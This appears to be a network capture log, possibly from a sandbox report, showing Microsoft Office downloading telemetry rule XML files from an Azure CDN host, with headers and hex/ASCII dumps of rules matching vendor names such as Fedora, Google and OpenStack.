2024-10-30 02:46:40 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
43192.168.2.44979813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:40 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:40 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:40 GMT
Content-Type: text/xml
Content-Length: 448
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
ETag: "0x8DC582BB389F49B"
x-ms-request-id: 51ccb76b-001e-0049-0a37-265bd5000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024640Z-15b8d89586ff5l62aha9080wv000000008pg00000000cb0t
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:40 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


Session IDSource IPSource PortDestination IPDestination Port
44192.168.2.44979913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:40 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:40 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:40 GMT
Content-Type: text/xml
Content-Length: 491
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B98B88612"
x-ms-request-id: 7d1d0a8a-d01e-0049-263b-26e7dc000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024640Z-r197bdfb6b4qbfppwgs4nqza800000000630000000003ypg
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:40 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
45192.168.2.44980013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:40 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:40 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:40 GMT
Content-Type: text/xml
Content-Length: 416
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
ETag: "0x8DC582BAEA4B445"
x-ms-request-id: a1cd263b-b01e-0070-5f2a-271cc0000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024640Z-16849878b78qwx7pmw9x5fub1c00000005gg00000000h08v
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:40 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


Session IDSource IPSource PortDestination IPDestination Port
46192.168.2.44980113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:41 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:41 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:41 GMT
Content-Type: text/xml
Content-Length: 479
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B989EE75B"
x-ms-request-id: 1eef1b3e-901e-002a-4bcc-267a27000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024641Z-17c5cb586f672xmrz843mf85fn000000066000000000ewez
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:41 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
47192.168.2.44980213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:41 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:41 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:41 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
ETag: "0x8DC582BA80D96A1"
x-ms-request-id: 4a7bd2a8-301e-0096-209e-26e71d000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024641Z-16849878b787bfsh7zgp804my4000000063g00000000rhwa
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:41 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session IDSource IPSource PortDestination IPDestination Port
48192.168.2.44980313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:41 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:41 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:41 GMT
Content-Type: text/xml
Content-Length: 471
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
ETag: "0x8DC582B97E6FCDD"
x-ms-request-id: d0d63b60-601e-0050-7d63-272c9c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024641Z-r197bdfb6b4b4pw6nr8czsrctg000000084000000000dauc
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:41 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
49192.168.2.44980413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:41 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:41 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:41 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
ETag: "0x8DC582B9C710B28"
x-ms-request-id: c1b2f9d4-701e-0098-1062-26395f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024641Z-16849878b78wc6ln1zsrz6q9w8000000073g00000000bwwq
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:41 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session IDSource IPSource PortDestination IPDestination Port
50192.168.2.44980513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:41 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:41 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:41 GMT
Content-Type: text/xml
Content-Length: 477
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
ETag: "0x8DC582BA54DCC28"
x-ms-request-id: 6c6fa777-201e-003c-1958-2630f9000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024641Z-r197bdfb6b4d9xksru4x6qbqr000000007f000000000dt9w
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:41 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
51192.168.2.44980913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:42 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:42 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:42 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
ETag: "0x8DC582BB650C2EC"
x-ms-request-id: c2db9b5f-901e-0015-105a-27b284000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024642Z-16849878b786jv8w2kpaf5zkqs00000006a000000000avsk
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:42 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
52192.168.2.44980613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:42 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:42 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:42 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
ETag: "0x8DC582BB7F164C3"
x-ms-request-id: 07599615-001e-0082-48f6-265880000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024642Z-17c5cb586f6w4mfs5xcmnrny6n000000096g00000000apuq
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:42 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session IDSource IPSource PortDestination IPDestination Port
53192.168.2.44981013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:42 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:42 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:42 GMT
Content-Type: text/xml
Content-Length: 468
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
ETag: "0x8DC582BB3EAF226"
x-ms-request-id: fbbf15bf-401e-0015-226f-280e8d000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024642Z-r197bdfb6b4qbfppwgs4nqza800000000650000000000a6f
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:42 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


Session IDSource IPSource PortDestination IPDestination Port
54192.168.2.44980713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:42 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:42 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:42 GMT
Content-Type: text/xml
Content-Length: 477
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
ETag: "0x8DC582BA48B5BDD"
x-ms-request-id: 2cfbf663-801e-0083-68dc-26f0ae000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024642Z-17c5cb586f6lxnvg801rcb3n8n00000007f0000000001zpc
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
